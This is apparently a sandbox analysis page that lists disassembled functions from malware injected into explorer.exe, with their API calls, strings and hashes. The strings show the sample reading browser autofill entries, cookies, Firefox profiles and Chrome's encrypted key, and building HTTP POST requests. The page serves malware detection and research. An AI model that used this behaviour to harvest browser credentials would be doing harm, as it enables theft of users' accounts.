Opcode Fuzzy Hash: 23d0a01393b7bfe63dc369c5b6e3a0f8feb8c095d53cae4f5d79b5de4e8245c8
Instruction Fuzzy Hash: 9FA108B29186935BD7218E78DCE07F1BBA5EB42324B38076DC5D18B3C6E7609C06C755

Function 02D64B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02D61162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D6116F

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02D64BB6
NtUnmapViewOfSection.NTDLL(000000FF), ref: 02D64BBF

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: 9bc3af193b50b2447926297e06b05879f8b1c8a810271e63faf81e928c8169c2
Instruction ID: 98722883e9c49505bc739d2e04987784b5e6a730fc5ac58bdfd582d027df2c0e
Opcode Fuzzy Hash: 9bc3af193b50b2447926297e06b05879f8b1c8a810271e63faf81e928c8169c2
Instruction Fuzzy Hash: 2CE01236945212A7C6647F74F85CB6A3B5DDB96361F20C915A15992380CB35CC50CAA0

Function 02D61011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02D61162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D6116F

GetProcessHeap.KERNEL32(00000000,00000000,?,02D61A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2), ref: 02D61020
RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61027

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: Heap$FreeProcessQueryVirtual
String ID:
API String ID: 2580854192-0
Opcode ID: 398e34ae84cdaeeeb3ca7cafc67f8dd6511f75f3e2301ab6cb956e9c1a9a1c2c
Instruction ID: c6b359b242c470910167be7b74295026791db22d9c8623be6a50156aacd17481
Opcode Fuzzy Hash: 398e34ae84cdaeeeb3ca7cafc67f8dd6511f75f3e2301ab6cb956e9c1a9a1c2c
Instruction Fuzzy Hash: 5FC04C72C85260D7CA6167B4792CBDA3B1DDF496A6F050841B509A7345CA65CC518AE0

Function 02D66512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(02DC20A4,00000001,00000000,0000000A,02DB3127,02D628DA,00000000,?), ref: 02D6BFFC

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 08a31eafcb4fb02340cdab638fa6749e5e4d4cb665898421e61b62149290e112
Instruction ID: 95eac8a094f8e63a73aa52678855d92ea688dad5eec01b787a64209c45951bfc
Opcode Fuzzy Hash: 08a31eafcb4fb02340cdab638fa6749e5e4d4cb665898421e61b62149290e112
Instruction Fuzzy Hash: D5E0ED3178831176F61036B86C1FF2A164E8B80B10F704A19B719EA3CADBD9CD5158B6

Function 02D63C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D61B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
Part of subcall function 02D61B6A: CloseHandle.KERNELBASE(00000000), ref: 02D61B8F

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

GetTempPathW.KERNEL32(00000104,00000000), ref: 02D63C6A
GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 02D63C76
DeleteFileW.KERNELBASE(00000000), ref: 02D63C7D
CopyFileW.KERNELBASE(?,00000000,00000000), ref: 02D63C89
lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 02D63D2F
lstrlen.KERNEL32(00000000), ref: 02D63D36
wsprintfA.USER32 ref: 02D63D55
lstrlen.KERNEL32(00000000), ref: 02D63D61
lstrcat.KERNEL32(00000000,?), ref: 02D63D89
lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02D63DB2
DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02D63DED

Strings

SELECT name,value FROM autofill, xrefs: 02D63CAA
%s = %s, xrefs: 02D63D4F
AUTOFILL, xrefs: 02D63DBD, 02D63DC2, 02D63DCC

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
API String ID: 2923052733-3488123210
Opcode ID: b6ed524bc4e43c9c5f596e8748610c3597e990347fe0d5b485fe84709aad9a8b
Instruction ID: d3f9bbdee155e313a7de55d6030dcb7023bcd21c136430d5a4ea66c387a2678e
Opcode Fuzzy Hash: b6ed524bc4e43c9c5f596e8748610c3597e990347fe0d5b485fe84709aad9a8b
Instruction Fuzzy Hash: 29417D31608241EBD711AB758C98E3F7BAEEF85B45F10486CF946A6341DB35DC058FA2

Function 02D628F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 02D62AD2

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 02D629E1
lstrlen.KERNEL32(00000000), ref: 02D629EC
wsprintfA.USER32 ref: 02D62A38
lstrlen.KERNEL32(00000000), ref: 02D62A44
lstrcat.KERNEL32(00000000,00000000), ref: 02D62A6C
lstrlen.KERNEL32(00000000,?,?), ref: 02D62A99

Strings

FALSE, xrefs: 02D62A06
COOKIES, xrefs: 02D62AA4, 02D62AAB, 02D62AB1
TRUE, xrefs: 02D62A13
%sTRUE%s%s%s%s%s, xrefs: 02D62A32

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
API String ID: 304071051-2605711689
Opcode ID: b99e4c590446b64e01969e3cb0a8aa1ef2f8457d229fefae4c526b234e4021c0
Instruction ID: af886945491d3b477511144010f461186a12bd6a083fbfd89c4900f1628fce3e
Opcode Fuzzy Hash: b99e4c590446b64e01969e3cb0a8aa1ef2f8457d229fefae4c526b234e4021c0
Instruction Fuzzy Hash: A1518D316483468BDB25EF209858B3F77EAEFC5745F04482DE8859B341DB25DC09CBA2

Function 02D62CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

Part of subcall function 02D61B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02D62893,00000000,00000000,00000000,?), ref: 02D61B82
Part of subcall function 02D61B6A: CloseHandle.KERNELBASE(00000000), ref: 02D61B8F

GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 02D62D13
StrStrIW.SHLWAPI(00000000,Profile), ref: 02D62D45
GetPrivateProfileStringW.KERNEL32(00000000,Path,02DB637C,?,00000FFF,?), ref: 02D62D68
GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 02D62D7B
lstrlenW.KERNEL32(00000000), ref: 02D62DD8

Strings

IsRelative, xrefs: 02D62D75
Profile, xrefs: 02D62D3F
profiles.ini, xrefs: 02D62CCD
Path, xrefs: 02D62D62

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
String ID: IsRelative$Path$Profile$profiles.ini
API String ID: 2234428054-4107377610
Opcode ID: 1bc1e460bf237b681f73ecc37b399c5fb3acd01cdd1a174f16a45f7a66a7cee2
Instruction ID: 970b58054bfdf62f4300c0780efd7b56037600033c07be2c6579216a7f3a1b45
Opcode Fuzzy Hash: 1bc1e460bf237b681f73ecc37b399c5fb3acd01cdd1a174f16a45f7a66a7cee2
Instruction Fuzzy Hash: ED318D30A443029B9B11AF70986C67F77A6EFC4710F10482AE94AA7381DB75CC46DFE2

Function 02D61333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

Part of subcall function 02D6106C: lstrlen.KERNEL32(031F711E,00000000,00000000,00000000,02D61366,74DE8A60,031F711E,00000000), ref: 02D61074
Part of subcall function 02D6106C: MultiByteToWideChar.KERNEL32(00000000,00000000,031F711E,00000001,00000000,00000000), ref: 02D61086

Part of subcall function 02D612A3: RtlZeroMemory.NTDLL(?,00000018), ref: 02D612B5

RtlZeroMemory.NTDLL(?,0000003C), ref: 02D613C2
wsprintfW.USER32 ref: 02D614B5
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02D61594

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 02D614FB
Accept: */*Referer: %S, xrefs: 02D614AF
POST, xrefs: 02D61465

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
API String ID: 3833683434-704803497
Opcode ID: 106e1f270ef204c401902709d7c923a39375e880bb6b4ad8e90a3fef53aa76c2
Instruction ID: 6dea42065d4a8be2a3270a9d65e361f22c4648c183a96c62643930dbdf5b75ab
Opcode Fuzzy Hash: 106e1f270ef204c401902709d7c923a39375e880bb6b4ad8e90a3fef53aa76c2
Instruction Fuzzy Hash: 34712671A08341EFD7119F649898A2BBBEDEB88344F10492DF999D3351DB70DD04CBA2

Function 02D6B1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 02D6B31D
MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 02D6B34F

Strings

winShmMap1, xrefs: 02D6B278
winShmMap3, xrefs: 02D6B399
winShmMap2, xrefs: 02D6B2CF

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: File$CreateMappingView
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 3452162329-3826999013
Opcode ID: 293d3e8e0ac978c164f2dbe6e1dbe30a9a53af99fa06d6870233a3215dd94d79
Instruction ID: 4f98ffc4cd89558e3756d77378f0152e959d20c2ce79d8f03abdc0d8ff9b8b38
Opcode Fuzzy Hash: 293d3e8e0ac978c164f2dbe6e1dbe30a9a53af99fa06d6870233a3215dd94d79
Instruction Fuzzy Hash: 31518E716047019FDB25CF18C888A7A77E6EB88318F14892EE986DB351DB70EC15CB51

Function 02D6A40E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL(?,?,?), ref: 02D6A455
memcpy.NTDLL(?,?,?), ref: 02D6A479
ReadFile.KERNELBASE(?,?,?,?,?), ref: 02D6A4DB
memset.NTDLL ref: 02D6A546

Strings

winRead, xrefs: 02D6A515

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: memcpy$FileReadmemset
String ID: winRead
API String ID: 2051157613-2759563040
Opcode ID: f30bd17aa3b2588d1ebc9dd2dcafa7508e09721efffb93e225e668c3e6b9b0be
Instruction ID: 8fbc98c9553691eb1b67625f05246b4cc84611bbf2f53102713f3b19a9bc8f1e
Opcode Fuzzy Hash: f30bd17aa3b2588d1ebc9dd2dcafa7508e09721efffb93e225e668c3e6b9b0be
Instruction Fuzzy Hash: 58316D72605245ABD750DE28DC889AF77E6EFC8314F845929F98AA7310D730ED05CBA2

Function 02D62E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 113
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE(?,?), ref: 02D62E4B
RegOpenKeyExW.KERNELBASE(?,?,00000000,00020119,?), ref: 02D62EE4
RegEnumKeyExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02D62F54
RegCloseKey.KERNELBASE(?), ref: 02D62F62

Part of subcall function 02D619E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A1E
Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A3C
Part of subcall function 02D619E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A75
Part of subcall function 02D619E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A98

Part of subcall function 02D61BC5: lstrlenW.KERNEL32(00000000,00000000,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61BCC
Part of subcall function 02D61BC5: StrStrIW.SHLWAPI(00000000,.exe,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61BF0
Part of subcall function 02D61BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61C05
Part of subcall function 02D61BC5: lstrlenW.KERNEL32(00000000,?,02D62E75,PathToExe,00000000,00000000), ref: 02D61C1C

Part of subcall function 02D61AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,?,?,02D62E83,PathToExe,00000000,00000000), ref: 02D61B16

Strings

PathToExe, xrefs: 02D62E5E

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
String ID: PathToExe
API String ID: 1799103994-1982016430
Opcode ID: 4a71a26657e7e07eaff35fa65f2502957be72099aa8d25c3d9f9f4fc83a11e94
Instruction ID: f1522e5caaa12f2284a39d9e044abe42c4a3abcab7e8adb47f27a66eccc7e96c
Opcode Fuzzy Hash: 4a71a26657e7e07eaff35fa65f2502957be72099aa8d25c3d9f9f4fc83a11e94
Instruction Fuzzy Hash: 7E313771604211AF9B15AF62881C97FBAAAEFC4750F04852DFC6997384EA34CD06DFA1

Function 02D6A67C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_alldiv.NTDLL(?,?,?), ref: 02D6A6AD
_allmul.NTDLL(00000000,?,?), ref: 02D6A6B6
SetEndOfFile.KERNELBASE(?), ref: 02D6A6F3

Strings

winTruncate1, xrefs: 02D6A6DF
winTruncate2, xrefs: 02D6A717

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: File_alldiv_allmul
String ID: winTruncate1$winTruncate2
API String ID: 3568847005-470713972
Opcode ID: d80d43b297c3612682afc48782943d40d81d95ed84bca50cd2e147f2f44cf557
Instruction ID: 85843300b8ad424273041c17ef5dadd808535241c7a833dbd8b55a4f07d159eb
Opcode Fuzzy Hash: d80d43b297c3612682afc48782943d40d81d95ed84bca50cd2e147f2f44cf557
Instruction Fuzzy Hash: 9E21AC72200200ABDB149E69CC98EB777AAEF84310F158169ED85EB385D735DC10CBB1

Function 02D64A71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

wsprintfW.USER32 ref: 02D64AA2
RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 02D64AC7
RegCloseKey.KERNELBASE(?), ref: 02D64AD4

Strings

%s\%08x, xrefs: 02D64A9C
Software, xrefs: 02D64A95

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: Heap$AllocateCloseCreateProcesswsprintf
String ID: %s\%08x$Software
API String ID: 1800864259-1658101971
Opcode ID: a12f49f359fdfa0ba1d86e96437f03888921581c35f0829759dc97faab05ef72
Instruction ID: 895ece4b911af616cf41035d211d2912b8d037836503e3f1419aef388437ce16
Opcode Fuzzy Hash: a12f49f359fdfa0ba1d86e96437f03888921581c35f0829759dc97faab05ef72
Instruction Fuzzy Hash: 68012471A04008FFAB188F81DC4EDBF77ADEB44244F50006EF505A3340DA719D00A6A0

Function 02D64317 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON

Download Yara Rule

APIs

_alloca_probe.NTDLL ref: 02D6431C
RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 02D64335
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02D64363
RegCloseKey.ADVAPI32(?), ref: 02D643C8

Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994

Part of subcall function 02D6418A: wsprintfW.USER32 ref: 02D64212

Part of subcall function 02D61011: GetProcessHeap.KERNEL32(00000000,00000000,?,02D61A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2), ref: 02D61020
Part of subcall function 02D61011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61027

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 02D643B9

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
String ID:
API String ID: 801677237-0
Opcode ID: de67f8140c433e36fb3affc4db018b3794f28cd0f4d84ee199b2a5ed5af3ad59
Instruction ID: 0f12f55fd6312fe9be1c46aa9b0665b05e8c2cefc3a9766f99cc91f72f0bbfc7
Opcode Fuzzy Hash: de67f8140c433e36fb3affc4db018b3794f28cd0f4d84ee199b2a5ed5af3ad59
Instruction Fuzzy Hash: 7B1160B1508205AFE7169B20DC48EBF77EDEB88304F00492EB589D2340EB74ED589A72

Function 02D6B87B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 202fileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 02D6B8D5
CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 02D6B96F

Strings

winOpen, xrefs: 02D6BA22
psow, xrefs: 02D6BA95

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: CreateFilememset
String ID: psow$winOpen
API String ID: 2416746761-4101858489
Opcode ID: 703dbcd214232fb2aaa9ed3a8eef12bbbf4f8461fbdd59f0da93eda41593c03c
Instruction ID: 11ac7f82dcc00dcb1d82aab3cd9d8b31c586cad1ff03198e3e8bfdfe1e6e134b
Opcode Fuzzy Hash: 703dbcd214232fb2aaa9ed3a8eef12bbbf4f8461fbdd59f0da93eda41593c03c
Instruction Fuzzy Hash: F4714C71A087029FD710DF24C88476ABBE5FF48728F104A2AE8A5E7381D775DD54CBA2

Function 02D619E5 Relevance: 6.1, APIs: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A1E
RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A3C
RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 02D61A75
RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61A98

Part of subcall function 02D61011: GetProcessHeap.KERNEL32(00000000,00000000,?,02D61A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2), ref: 02D61020
Part of subcall function 02D61011: RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,02D61AE2,PortNumber,00000000,00000000), ref: 02D61027

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: HeapQueryValue$CloseFreeOpenProcess
String ID:
API String ID: 217796345-0
Opcode ID: 26da3d7857c45d655a608b0479b875c0973eab8e4e0139ed2b3d508b9efcefd0
Instruction ID: 5296e16a88b5830604c9116d72cbd51d2f19f0e22e2d8b8ecc510867b75c3ef3
Opcode Fuzzy Hash: 26da3d7857c45d655a608b0479b875c0973eab8e4e0139ed2b3d508b9efcefd0
Instruction Fuzzy Hash: E821A672609341AFEB258A21CD48F7B77EDEBC4758F144A1DF59992340D722CD05C671

Function 02D61EC1 Relevance: 6.1, APIs: 4, Instructions: 82registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(?,?,?), ref: 02D61ED5

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D61F0C
RegCloseKey.ADVAPI32(?), ref: 02D61F98

Part of subcall function 02D61953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02D62F0C), ref: 02D61973
Part of subcall function 02D61953: lstrlenW.KERNEL32(02DB6564,?,?,02D62F0C), ref: 02D61978
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,?,?,?,02D62F0C), ref: 02D61990
Part of subcall function 02D61953: lstrcatW.KERNEL32(00000000,02DB6564,?,?,02D62F0C), ref: 02D61994

RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D61F82

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
String ID:
API String ID: 1077800024-0
Opcode ID: cce03fb55b19e29c0a4b7d789e3002392cbca7a7b30d2ef2c287eb7bff00ff04
Instruction ID: 840da756c5258a838d4c8ffd4cd8855150e54e614844cd14c19d3ac47010db81
Opcode Fuzzy Hash: cce03fb55b19e29c0a4b7d789e3002392cbca7a7b30d2ef2c287eb7bff00ff04
Instruction Fuzzy Hash: 02214872608201AFDB059B61DC48E3BBBEEEF88244F00892DF89992350DB75DD15DB62

Function 02D61C31 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,02D63E1E,00000000,?,02D63FA8), ref: 02D61C46
GetFileSize.KERNEL32(00000000,00000000,00000000,?,02D63FA8), ref: 02D61C56
CloseHandle.KERNEL32(00000000,?,02D63FA8), ref: 02D61C91

Part of subcall function 02D61000: GetProcessHeap.KERNEL32(00000008,?,02D611C7,?,?,00000001,00000000,?), ref: 02D61003
Part of subcall function 02D61000: RtlAllocateHeap.NTDLL(00000000), ref: 02D6100A

ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,02D63FA8), ref: 02D61C76

Memory Dump Source

Source File: 00000011.00000002.2432942972.0000000002D61000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_2d61000_explorer.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 9eb0f586a4987017e442c84b63271dfa765cbd8277c158a15a4eb1de6da89549
Instruction ID: 3a3d65756e4c309a74f99e7f473212f3da2c406c06c6b5616d7272e14c1a42c0
Opcode Fuzzy Hash: 9eb0f586a4987017e442c84b63271dfa765cbd8277c158a15a4eb1de6da89549
Instruction Fuzzy Hash: FDF0F432200218BBC2211A26DC8CF7FBB6DDB426FAF220B18F409D23C0DB12DC1191B0

Function 02D62FB1 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON

Download Yara Rule

APIs

StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,02D63E30,00000000,00000000,?,02D63FA8), ref: 02D62FC1
lstrlen.KERNEL32("encrypted_key":",?,02D63FA8), ref: 02D62FCE
StrStrIA.SHLWAPI("encrypted_key":",02DB692C,?,02D63FA8), ref: 02D62FDD

Part of subcall function 02D6190B: lstrlen.KERNEL32(?,?,?,?,00000000,02D62783), ref: 02D6192B
Part of subcall function 02D6190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,02D62783), ref: 02D61930
Part of subcall function 02D6190B: lstrcat.KERNEL32(00000000,?), ref: 02D61946
Part of subcall function 02D6190B: lstrcat.KERNEL32(00000000,00000000), ref: 02D6194A

Strings

